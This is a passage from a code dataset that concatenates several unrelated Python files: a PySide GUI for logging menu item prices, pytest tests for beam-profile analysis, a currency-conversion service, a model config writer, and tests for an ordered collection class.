'max_price'.\n 2. Compare 'priceBox' and 'min_price' and store the smaller amount in 'min_price'.\n b. If there aren't any previous entries from the user:\n 1. Store the value in 'priceBox' in 'max_price'.\n 2. Store the value in 'priceBox' in 'min_price'.\n c. Sort item prices based off type of food and store the values in the associated list.\n 1. Append the value in 'priceBox' to the list 'allPriceList'.\n 2. Convert the value in 'typeBox' to lowercase and remove whitespace in the front and back of the value and store the new value in 'typeBoxString'.\n 3. If typeBoxString == \"appetizer\":\n i. Append the value in 'priceBox' into the list 'appPriceList' as a float.\n 4. Elif typeBoxString == \"entree\":\n i. Append the value in 'priceBox' into the list 'entreePriceList' as a float.\n 5. Elif typeBoxString == \"dessert\":\n i. Append the value in 'priceBox' into the list 'dessertPriceList' as a float.\n 6. Else:\n i. Append the value in 'priceBox' into the list 'otherPriceList' as a float.\n d. Prevent averaged values from dividing by zero and causing a math error:\n 1. If there are values in 'allPriceList':\n i. 'overallAvg' = the sum of values in 'allPriceList' divided by the number of values in 'allPriceList'.\n 2. If there aren't values in 'allPriceList':\n i. 'overallAvg' = the sum of values in 'allPriceList' divided by 1.00.\n 3. If there are values in 'appPriceList':\n i. 'appAvg' = the sum of values in 'appPriceList' divided by the number of values in 'appPriceList'.\n 4. If there aren't values in 'appPriceList':\n i. 'appAvg' = the sum of values in 'appPriceList' divided by 1.00.\n 5. If there are values in 'entreePriceList':\n i. 'entreeAvg' = the sum of values in 'entreePriceList' divided by the number of values in 'entreePriceList'.\n 6. If there aren't values in 'entreePriceList':\n i. 'entreeAvg' = the sum of values in 'entreePriceList' divided by 1.00.\n 7. If there are values in 'dessertPriceList':\n i. 'dessertAvg' = the sum of values in 'dessertPriceList' divided by the number of values in 'dessertPriceList'.\n 8. If there aren't values in 'dessertPriceList':\n i. 'dessertAvg' = the sum of values in 'dessertPriceList' divided by 1.00.\n 9. If there are values in 'otherPriceList':\n i. 'otherAvg' = the sum of values in 'otherPriceList' divided by the number of values in 'otherPriceList'.\n 10. If there aren't values in 'otherPriceList':\n i. 'otherAvg' = the sum of values in 'otherPriceList' divided by 1.00.\n e. Appends user input into a string with selected split identifiers to sort into lists:\n 1. Appends 'foodBox' value concatenated with \"|\" to 'splitData'.\n 2. Appends 'typeBox' value concatenated with \"|\" to 'splitData'.\n 3. Appends 'priceBox' value concatenated with \"\\n\" to 'splitData'.\n f. Assign 'text' = 'splitData' to display xml in Main Dialog Box.\n g. Close the Child Dialog Box after Main Dialog Box is ready.\n10) Define a function called 'closeFile' for 'self' that will exit the application.\n a. Close 'self'.\n11) Create a new instance of 'QApplication' with \"sys.argv\" properties named 'app'.\n12) Create a new instance of 'MyGui' named 'mygui'.\n13) Run PySide and only exit PySide upon closing 'mygui'.\n\"\"\"\n\n# Import from PySide or PySide2 (QtWidgets)\ntry:\n from PySide import QtGui, QtCore\n import PySide.QtGui as QtWidgets\nexcept ImportError:\n from PySide2 import QtGui, QtCore, QtWidgets\nimport sys\n\n# Creates the Main Dialog Box as an Object (Class)\nclass MyGui(QtWidgets.QMainWindow):\n \"\"\" Main Dialog Box that allow reading plain text files \"\"\"\n def __init__(self):\n \"\"\" Initiallizes the Main Dialog Box and establishes object variables \"\"\"\n # Setup the Main Dialog Box properties\n QtWidgets.QMainWindow.__init__(self)\n self.initMenu()\n self.text = QtWidgets.QTextEdit()\n self.text.setReadOnly(True)\n self.setCentralWidget(self.text)\n self.setGeometry(250,250,700,400)\n self.setWindowTitle(\"Craig Opie - Project 1\")\n self.show()\n\n # Establish Object wide variables\n self.allPriceList = []\n self.appPriceList = []\n self.entreePriceList = []\n self.dessertPriceList = []\n self.otherPriceList = []\n self.startData = str('\\n\\n')\n self.userData = \"\"\n self.closingData = \"\"\n self.finalData = \"\"\n self.itemList = \"\"\n self.splitData = \"\"\n self.foodBox = \"\"\n self.typeBox = \"\"\n self.typeBoxString = \"\"\n self.overallAvg = 0.00\n self.appAvg = 0.00\n self.entreeAvg = 0.00\n self.dessertAvg = 0.00\n self.otherAvg = 0.00\n self.priceBox = 0.00\n self.max_price = 0.00\n self.min_price = 0.00\n\n def initMenu(self):\n \"\"\" Creates the Main Dialog Box menu items \"\"\"\n menubar = self.menuBar()\n fileMenu = menubar.addMenu(\"File\")\n\n # Opens a new Dialog for user input into pre-determined fields\n addItem = QtWidgets.QAction(\"Add Item\", self)\n addItem.triggered.connect(self.addItem)\n fileMenu.addAction(addItem)\n\n # Opens a save Dialog for the user to save the displayed information\n save_ = QtWidgets.QAction(\"Save\", self)\n save_.triggered.connect(self.saveFile)\n fileMenu.addAction(save_)\n\n # Opens a load Dialog for the user to load a plain text file to be displayed\n open_ = QtWidgets.QAction(\"Open\", self)\n open_.triggered.connect(self.openFile)\n fileMenu.addAction(open_)\n\n # Allows the user to quit the application\n quit_ = QtWidgets.QAction(\"Quit\", self)\n quit_.triggered.connect(self.closeFile)\n fileMenu.addAction(quit_)\n\n def saveFile(self):\n \"\"\" Saves information displayed in the Main Dialog Box to an xml format \"\"\"\n # Sorts the user input into lists and appends xml data to a string for the Main Dialog Box\n self.itemList = self.splitData.strip().split(\"\\n\")\n for eachline in self.itemList:\n items = eachline.split(\"|\")\n self.userData += str(\"\\n \")\n self.userData += str(\"\\n \"+items[0]+\"\")\n self.userData += str(\"\\n \"+items[1]+\"\")\n self.userData += str(\"\\n \"+items[2]+\"\")\n self.userData += str(\"\\n \")\n\n # Appends closing and final xml data to a string that is to be combined with the previous\n # String xml data\n self.closingData = str(\"\\n \"+str(\"%.2f\" % (self.overallAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.appAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.entreeAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.dessertAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.otherAvg))+\"\")\n self.closingData += str(\"\\n \")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.max_price))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.min_price))+\"\")\n self.closingData += str(\"\\n \")\n self.closingData += str(\"\\n\")\n\n # Creates a final string of xml data to be displayed in the Main Dialog Box\n self.finalData = str(self.startData) + str(self.userData) + str(self.closingData)\n\n # Opens a Dialog Box for the user to select name and location of file to save 'finalData'\n filename, _ = QtWidgets.QFileDialog.getSaveFileName(self, \"Save File\",\".\")\n if (filename != \"\"):\n outfile = open(filename, \"w\")\n contents = self.finalData\n outfile.write(contents)\n outfile.close()\n\n def openFile(self):\n \"\"\" Opens a plain text file to display in the Main Dialog Box \"\"\"\n filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, \"Open File\",\".\")\n if (filename != \"\"):\n infile = open(filename, \"r\")\n contents = infile.read()\n infile.close()\n self.text.setText(contents)\n\n def addItem(self):\n \"\"\" Creates a Child Dialog Box with user input fields to display in the Main Dialog Box \"\"\"\n # Setup the Child Dialog Box properties\n self.myDialog = QtWidgets.QDialog(self)\n self.myDialog.setWindowTitle(\"Enter Data\")\n self.setGeometry(350,350,400,200)\n layout = QtWidgets.QGridLayout()\n self.myDialog.setLayout(layout)\n\n # Create the first row of widgets for user input\n labelFood = QtWidgets.QLabel(\"Enter Food\")\n layout.addWidget(labelFood,0,0)\n foodBox = QtWidgets.QLineEdit()\n layout.addWidget(foodBox,0,1)\n self.foodBox = foodBox\n\n # Create the second row of widgets for user input\n labelType = QtWidgets.QLabel(\"Enter Type\")\n layout.addWidget(labelType,1,0)\n typeBox = QtWidgets.QLineEdit()\n layout.addWidget(typeBox,1,1)\n self.typeBox = typeBox\n\n # Create the third row of widgets for user input\n labelPrice = QtWidgets.QLabel(\"Enter Price\")\n layout.addWidget(labelPrice,2,0)\n priceBox = QtWidgets.QLineEdit()\n layout.addWidget(priceBox,2,1)\n self.priceBox = priceBox\n\n # Creates a third column for buttons that are styled and allows user control\n buttons = QtWidgets.QDialogButtonBox()\n buttons.setOrientation(QtCore.Qt.Vertical)\n buttons.addButton(\"Add\",QtWidgets.QDialogButtonBox.AcceptRole)\n buttons.addButton(\"Cancel\",QtWidgets.QDialogButtonBox.RejectRole)\n # Exits the Child Dialog Box without saving/appending information to the Main Dialog Box\n self.myDialog.connect(buttons,QtCore.SIGNAL(\"rejected()\"),self.myDialog.close)\n # Exits the Child Dialog Box but saves/appends information to the Main Dialog Box\n self.myDialog.connect(buttons,QtCore.SIGNAL(\"accepted()\"),self.appendList)\n layout.addWidget(buttons,0,2,3,1,QtCore.Qt.AlignCenter)\n\n # Executes the above code to create the Child Dialog Box\n self.myDialog.exec_()\n\n def appendList(self):\n \"\"\" Updates lists and variables from the user input to display in the Main Dialog Box \"\"\"\n # If there are no previous entries the Max and Min values are set to equal the first entry\n # Otherwise, the item price entered is compared to see if it is the new Max or Min\n if len(self.allPriceList) != 0:\n if float(self.priceBox.text().strip()) > self.max_price:\n self.max_price = float(self.priceBox.text().strip())\n if float(self.priceBox.text().strip()) < self.min_price:\n self.min_price = float(self.priceBox.text().strip())\n else:\n self.max_price = float(self.priceBox.text().strip())\n self.min_price = float(self.priceBox.text().strip())\n\n # Sorts item price based off type of food and stores in a list for statistics\n self.allPriceList.append(float(self.priceBox.text().strip()))\n self.typeBoxString = self.typeBox.text().lower().strip()\n if str(self.typeBoxString) == \"appetizer\":\n self.appPriceList.append(float(self.priceBox.text().strip()))\n elif str(self.typeBoxString) == \"entree\":\n self.entreePriceList.append(float(self.priceBox.text().strip()))\n elif str(self.typeBoxString) == \"dessert\":\n self.dessertPriceList.append(float(self.priceBox.text().strip()))\n else:\n self.otherPriceList.append(float(self.priceBox.text().strip()))\n\n # Prevents averaged values from dividing by zero and causing an error\n if len(self.allPriceList) > 0:\n self.overallAvg = (sum(self.allPriceList)/len(self.allPriceList))\n else:\n self.overallAvg = (sum(self.allPriceList)/1.00)\n if len(self.appPriceList) > 0:\n self.appAvg = (sum(self.appPriceList)/len(self.appPriceList))\n else:\n self.appAvg = (sum(self.appPriceList)/1.00)\n if len(self.entreePriceList) > 0:\n self.entreeAvg = (sum(self.entreePriceList)/len(self.entreePriceList))\n else:\n self.entreeAvg = (sum(self.entreePriceList)/1.00)\n if len(self.dessertPriceList) > 0:\n self.dessertAvg = (sum(self.dessertPriceList)/len(self.dessertPriceList))\n else:\n self.dessertAvg = (sum(self.dessertPriceList)/1.00)\n if len(self.otherPriceList) > 0:\n self.otherAvg = (sum(self.otherPriceList)/len(self.otherPriceList))\n else:\n self.otherAvg = (sum(self.otherPriceList)/1.00)\n\n # Appends user input into a string with selected split identifiers to sort into lists\n self.splitData += str(self.foodBox.text().title().strip() + \"|\")\n self.splitData += str(self.typeBox.text().title().strip() + \"|\")\n self.splitData += str(\"%.2f\" % (float(self.priceBox.text().strip())) + \"\\n\")\n\n # Sets the value of the Main Dialog Box\n self.text.setText(self.splitData)\n\n # Closes the Child Dialog after the Main Dialog Box is displaying the updated data.\n self.myDialog.done(0)\n\n def closeFile(self):\n self.done(0)\n\n# Specifies the variable that references Qt module data\napp = QtWidgets.QApplication(sys.argv)\n\n# Creates an instance of the MyGui Class/Object\nmygui = MyGui()\n\n# Executes the above code to create the Main Dialog Box\nsys.exit(app.exec_())\n","sub_path":"projects/project1/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":23412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"343624863","text":"from ast import literal_eval\nfrom pathlib import Path\nimport sys\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom pylhc import bsrt_analysis\n\n# Forcing non-interactive Agg backend so rendering is done similarly across platforms during tests\nmatplotlib.use(\"Agg\")\n\nINPUTS_DIR = Path(__file__).parent.parent / \"inputs\"\nBSRT_INPUTS = INPUTS_DIR / \"bsrt_analysis\"\nBASELINE_DIR = str(INPUTS_DIR / \"mpl_bsrt_baseline\")\n\ndef test_bsrt_df(_bsrt_df):\n results = bsrt_analysis.main(directory=str(BSRT_INPUTS), beam=\"B1\")\n assert_frame_equal(\n results[\"bsrt_df\"].sort_index(axis=1),\n _bsrt_df.copy().sort_index(axis=1),\n check_dtype=False, check_index_type=False\n )\n\n\ndef test_select_by_time():\n time_df = pd.DataFrame(index=np.linspace(0, 10, 11), data={\"A\": np.linspace(0, 10, 11)})\n with pytest.raises(AssertionError):\n bsrt_analysis._select_files({\"starttime\": 3, \"endtime\": 1}, time_df)\n assert_frame_equal(\n bsrt_analysis._select_files({\"starttime\": 1, \"endtime\": 3}, time_df), time_df.loc[1:3]\n )\n assert_frame_equal(\n bsrt_analysis._select_files({\"starttime\": 1, \"endtime\": None}, time_df), time_df.loc[1:]\n )\n assert_frame_equal(\n bsrt_analysis._select_files({\"starttime\": None, \"endtime\": 3}, time_df), time_df.loc[:3]\n )\n\n\nclass TestPlotting:\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fitvarplot(self, _bsrt_df):\n return bsrt_analysis.plot_fit_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fitvarplot_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_fit_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fullcrossection(self, _bsrt_df):\n return bsrt_analysis.plot_full_crosssection(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fullcrossection_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_full_crosssection(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_auxiliary_variables(self, _bsrt_df):\n return bsrt_analysis.plot_auxiliary_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_auxiliary_variables_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_auxiliary_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_crossection_for_timesteps(self, _bsrt_df, _kick_df):\n results = bsrt_analysis.plot_crosssection_for_timesteps(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n assert len(results) == len(_kick_df)\n return results[0]\n\n\n@pytest.fixture(scope=\"module\")\ndef _bsrt_df() -> pd.DataFrame:\n df = pd.read_csv(\n BSRT_INPUTS / bsrt_analysis._get_bsrt_tfs_fname(\"B1\"),\n engine=\"c\",\n parse_dates=True,\n index_col=\"TimeIndex\",\n quotechar='\"',\n converters={\n \"acquiredImageRectangle\": literal_eval,\n \"beam\": literal_eval,\n \"gateMode\": literal_eval,\n \"imageSet\": literal_eval,\n \"lastFitResults\": literal_eval,\n \"projDataSet1\": literal_eval,\n \"projDataSet2\": literal_eval,\n \"projPositionSet1\": literal_eval,\n \"projPositionSet2\": literal_eval,\n },\n )\n df.index = df.index.tz_localize(\"UTC\")\n return df\n\n\n@pytest.fixture()\ndef _kick_df() -> pd.DataFrame:\n return pd.DataFrame(\n index=[\n \"2018_07_24@11_38_30_000000\",\n \"2018_07_24@11_39_00_000000\",\n \"2018_07_24@11_39_30_000000\",\n \"2018_07_24@11_40_00_000000\",\n \"2018_07_24@11_40_30_000000\",\n ]\n )\n","sub_path":"tests/unit/test_bsrt_analysis.py","file_name":"test_bsrt_analysis.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323974744","text":"\"\"\"Services module.\"\"\"\n\nfrom typing import Iterator\n\nfrom .dtos import CurrencyIn, CurrencyOut, CurrencyQuotationIn, CurrencyQuotationOut, ConverterIn, ConverterOut\nfrom .repositories import CurrencyRepository, CurrencyQuotationRepository, NotFoundError\n\n\nclass CurrencyService:\n def __init__(self, currency_repository: CurrencyRepository) -> None:\n self._repository: CurrencyRepository = currency_repository\n\n def get_currencies(self) -> Iterator[CurrencyOut]:\n currencies = map(lambda currency: CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id),\n self._repository.get_all())\n\n return list(currencies)\n\n def get_currency_by_id(self, currency_id: int) -> CurrencyOut:\n currency = self._repository.get_by_id(currency_id)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def create_currency(self, currency: CurrencyIn) -> CurrencyOut:\n currency = self._repository.add(currency)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def update_currency(self, currency_id: int, currency: CurrencyIn) -> CurrencyOut:\n currency = self._repository.update_by_id(currency_id, currency)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def delete_currency_by_id(self, currency_id: int) -> None:\n return self._repository.delete_by_id(currency_id)\n\n\nclass CurrencyQuotationService:\n def __init__(self, currency_quotation_repository: CurrencyQuotationRepository) -> None:\n self._repository: CurrencyQuotationRepository = currency_quotation_repository\n\n def get_currency_quotations(self, currency_id: int) -> Iterator[CurrencyQuotationOut]:\n currency_quotations = map(\n lambda currency_quotation: CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date),\n self._repository.get_all(currency_id))\n\n return list(currency_quotations)\n\n def get_currency_quotation_by_id(self, currency_id: int, quotation_id: int) -> CurrencyQuotationOut:\n currency_quotation = self._repository.get_by_id(currency_id, quotation_id)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def create_currency_quotation(self, currency_id: int,\n currency_quotation: CurrencyQuotationIn) -> CurrencyQuotationOut:\n currency_quotation = self._repository.add(currency_id, currency_quotation)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def update_currency_quotation(self, currency_id: int, quotation_id: int,\n currency_quotation: CurrencyQuotationIn) -> CurrencyQuotationOut:\n currency_quotation = self._repository.update_by_id(currency_id, quotation_id, currency_quotation)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def delete_currency_quotation_by_id(self, currency_id: int, quotation_id: int) -> None:\n return self._repository.delete_by_id(currency_id, quotation_id)\n\n def convert_currency(self, converter: ConverterIn) -> ConverterOut:\n try:\n quotation_from = self._repository.get_by_id_and_date(converter.currency_id_from, converter.date)\n except NotFoundError:\n raise Exception('QuotationFrom not found in the database')\n\n quotation_from = CurrencyQuotationOut(id=quotation_from.id,\n currency_id=quotation_from.currency_id,\n exchange_rate=quotation_from.exchange_rate,\n date=quotation_from.date)\n\n try:\n quotation_to = self._repository.get_by_id_and_date(converter.currency_id_to, converter.date)\n except NotFoundError:\n raise Exception('QuotationTo not found in the database')\n\n quotation_to = CurrencyQuotationOut(id=quotation_to.id,\n currency_id=quotation_to.currency_id,\n exchange_rate=quotation_to.exchange_rate,\n date=quotation_to.date)\n\n value = converter.value * quotation_from.exchange_rate / quotation_to.exchange_rate\n\n return ConverterOut(CurrencyQuotationFrom=quotation_from, CurrencyQuotationTo=quotation_to,\n value=value)\n","sub_path":"currency-converter/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"325850689","text":"import json \n\nconfig = {}\nconfig[\"batch_size\"] = 24 \nconfig[\"seq_length\"] = 512\nconfig[\"is_training\"] = True\nconfig[\"use_input_mask\"] = True\nconfig[\"use_token_type_ids\"] = True\nconfig[\"vocab_size\"] = 103\nconfig[\"hidden_size\"] = 768\nconfig[\"num_hidden_layers\"] = 12\nconfig[\"num_attention_heads\"] = 12\nconfig[\"intermediate_size\"] =3072\nconfig[\"hidden_act\"] = \"gelu\"\nconfig[\"hidden_dropout_prob\"] = 0.1\nconfig[\"attention_probs_dropout_prob\"] =0.1\nconfig[\"max_position_embeddings\"] = 512\nconfig[\"type_vocab_size\"] = 2\nconfig[\"intializer_range\"] = 0.02\nconfig[\"scope\"] = None\n\njson.dump(config,open(\"./config.json\",\"w\"))","sub_path":"generate_json.py","file_name":"generate_json.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"461391452","text":"#!/usr/bin/env python\n\nfrom pytest import raises\n\nfrom gnome.movers.simple_mover import SimpleMover\nfrom gnome.movers import Mover, RandomMover\n\nfrom gnome.utilities.orderedcollection import OrderedCollection\n\n\nclass TestOrderedCollection(object):\n\n def test_init(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc.dtype == int\n oc = OrderedCollection([1, 2, 3, 4, 5], int)\n assert oc.dtype == int\n oc = OrderedCollection(dtype=int)\n assert oc.dtype == int\n\n with raises(TypeError):\n\n # either a populated list or a dtype is required\n\n oc = OrderedCollection()\n\n with raises(TypeError):\n oc = OrderedCollection('not a list')\n\n with raises(TypeError):\n\n # either a populated list or a dtype is required\n\n oc = OrderedCollection([])\n\n with raises(TypeError):\n oc = OrderedCollection([1, 2, 3, 4, 5], float)\n\n def test_len(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert len(oc) == 5\n\n def test_iter(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert [i for i in oc] == [1, 2, 3, 4, 5]\n\n def test_contains(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert id(5) in oc\n\n def test_getitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc[id(3)] == 3\n with raises(KeyError):\n oc[id(6)]\n\n def test_setitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc[id(6)] = 6\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc[id(4)] = 7\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 7,\n 5,\n 6,\n ]\n\n def test_delitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n with raises(KeyError):\n del oc[id(6)]\n del oc[id(4)]\n assert [i for i in oc] == [1, 2, 3, 5]\n\n def test_iadd(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc += 6\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc += [7, 8, 9]\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n 7,\n 8,\n 9,\n ]\n\n def test_add(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc.add(6)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n with raises(TypeError):\n oc.add('not an int')\n\n def test_remove(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n with raises(KeyError):\n oc.remove(id(6))\n oc.remove(id(4))\n assert [i for i in oc] == [1, 2, 3, 5]\n\n def test_replace(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc.replace(id(6), 6)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc.replace(id(4), 7)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 7,\n 5,\n 6,\n ]\n assert oc[id(7)] == 7\n with raises(KeyError):\n\n # our key should also be gone after the delete\n\n oc[id(4)]\n with raises(TypeError):\n oc.replace(id(7), 'not an int')\n\n def test_index(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc.index(id(3)) == 2\n oc[id(3)] = 6\n assert oc.index(id(6)) == 2\n del oc[id(6)]\n assert oc.index(id(4)) == 2\n\n def test_with_movers(self):\n mover_1 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_2 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_3 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_4 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n\n # test our init, iter, get, and len methods\n\n mymovers = OrderedCollection([mover_1, mover_2], dtype=Mover)\n assert [m for m in mymovers] == [mover_1, mover_2]\n assert mymovers[mover_1.id] == mover_1\n assert len(mymovers) == 2\n\n # test our add methods\n\n mymovers = OrderedCollection(dtype=Mover)\n mymovers += mover_1\n mymovers += mover_2\n assert [m for m in mymovers] == [mover_1, mover_2]\n\n mymovers = OrderedCollection(dtype=Mover)\n mymovers += [mover_1, mover_2]\n assert [m for m in mymovers] == [mover_1, mover_2]\n\n # test our del method\n\n mymovers = OrderedCollection([mover_1, mover_2, mover_3],\n dtype=Mover)\n del mymovers[mover_2.id]\n assert [m for m in mymovers] == [mover_1, mover_3]\n\n # test our replace method\n\n mymovers = OrderedCollection([mover_1, mover_2, mover_3],\n dtype=Mover)\n mymovers[mover_2.id] = mover_4\n assert [m for m in mymovers] == [mover_1, mover_4, mover_3]\n assert mymovers[mover_4.id] == mover_4\n\n def test_eq(self):\n 'Test comparison operator __eq__'\n\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n == OrderedCollection([1, 2, 3, 4, 5])\n\n def test_ne(self):\n 'Test comparison operator (not equal)'\n\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n != OrderedCollection([2, 1, 3, 4, 5])\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n != OrderedCollection([1, 2, 3, 4])\n assert OrderedCollection([1, 2, 3, 4, 5]) != [1, 2, 3, 4, 5]\n\n def test_to_dict(self):\n 'added a to_dict() method - test this method'\n\n items = [SimpleMover(velocity=(i * 0.5, -1.0, 0.0)) for i in\n range(2)]\n items.extend([RandomMover() for i in range(2)])\n mymovers = OrderedCollection(items, dtype=Mover)\n dict_ = mymovers.to_dict()\n\n assert dict_['dtype'] == mymovers.dtype\n for (i, mv) in enumerate(items):\n assert dict_['items'][i][0] \\\n == '{0}.{1}'.format(mv.__module__, mv.__class__.__name__)\n assert dict_['items'][i][1] == i\n\n def test_int_to_dict(self):\n '''added a to_dict() method - test this method for int dtype.\n Tests the try, except is working correctly'''\n items = range(5)\n oc = OrderedCollection(items)\n dict_ = oc.to_dict()\n\n assert dict_['dtype'] == int\n for (i, item) in enumerate(items):\n assert dict_['items'][i][0] \\\n == '{0}'.format(item.__class__.__name__)\n assert dict_['items'][i][1] == i\n\n\nclass ObjToAdd:\n 'Define a helper class (mutable object) for use in TestCallbacks'\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.add_callback = False\n self.rm_callback = False\n self.replace_callback = False\n\n\nclass TestCallbacks:\n\n to_add = [ObjToAdd(), ObjToAdd(), ObjToAdd()]\n\n def test_add_callback(self):\n '''\n test add callback is invoked after adding an object or\n list of objects\n '''\n\n # lets work with a mutable type\n\n oc = OrderedCollection(dtype=ObjToAdd)\n oc.register_callback(self._add_callback, events='add')\n\n # check everything if False initially\n\n self._reset_ObjToAdd_init_state()\n\n oc += self.to_add\n oc += ObjToAdd()\n\n for obj in oc:\n assert obj.add_callback\n assert not obj.rm_callback\n assert not obj.replace_callback\n\n def test_remove_callback(self):\n 'test remove callback is invoked after removing an object'\n\n oc = OrderedCollection(dtype=ObjToAdd) # lets work with a mutable type\n oc.register_callback(self._rm_callback, events='remove')\n oc.register_callback(self._add_callback, events='add')\n\n # check everything if False initially\n\n self._reset_ObjToAdd_init_state()\n\n oc += self.to_add\n\n del oc[id(self.to_add[0])]\n\n assert self.to_add[0].rm_callback\n assert self.to_add[0].add_callback\n assert not self.to_add[0].replace_callback\n\n self.to_add[0].reset() # reset all to false\n oc += self.to_add[0] # let's add this back in\n\n for obj in oc:\n assert obj.add_callback\n assert not obj.rm_callback\n assert not obj.replace_callback\n\n def test_replace_callback(self):\n 'test replace callback is invoked after replacing an object'\n\n # lets work with a mutable type\n\n oc = OrderedCollection(dtype=ObjToAdd)\n oc.register_callback(self._replace_callback, events='replace')\n\n # check everything if False initially\n\n self._reset_ObjToAdd_init_state()\n\n oc += self.to_add\n rep = ObjToAdd()\n oc[id(self.to_add[0])] = rep\n\n for obj in oc:\n assert not obj.add_callback\n assert not obj.rm_callback\n if id(obj) == id(rep):\n assert obj.replace_callback\n else:\n assert not obj.replace_callback\n\n def test_add_replace_callback(self):\n 'register one callback with multiple events (add, replace)'\n\n # lets work with a mutable type\n\n oc = OrderedCollection(dtype=ObjToAdd)\n oc.register_callback(self._add_callback, events=('add',\n 'replace'))\n\n # check everything if False initially\n\n self._reset_ObjToAdd_init_state()\n\n oc += self.to_add\n\n for obj in oc:\n assert obj.add_callback\n assert not obj.rm_callback\n assert not obj.replace_callback\n\n rep = ObjToAdd()\n oc[id(self.to_add[0])] = rep\n\n for obj in oc:\n assert obj.add_callback\n assert not obj.rm_callback\n assert not obj.replace_callback\n\n def _add_callback(self, obj_):\n obj_.add_callback = True\n\n def _rm_callback(self, obj_):\n obj_.rm_callback = True\n\n def _replace_callback(self, obj_):\n obj_.replace_callback = True\n\n def _reset_ObjToAdd_init_state(self):\n for obj in self.to_add:\n 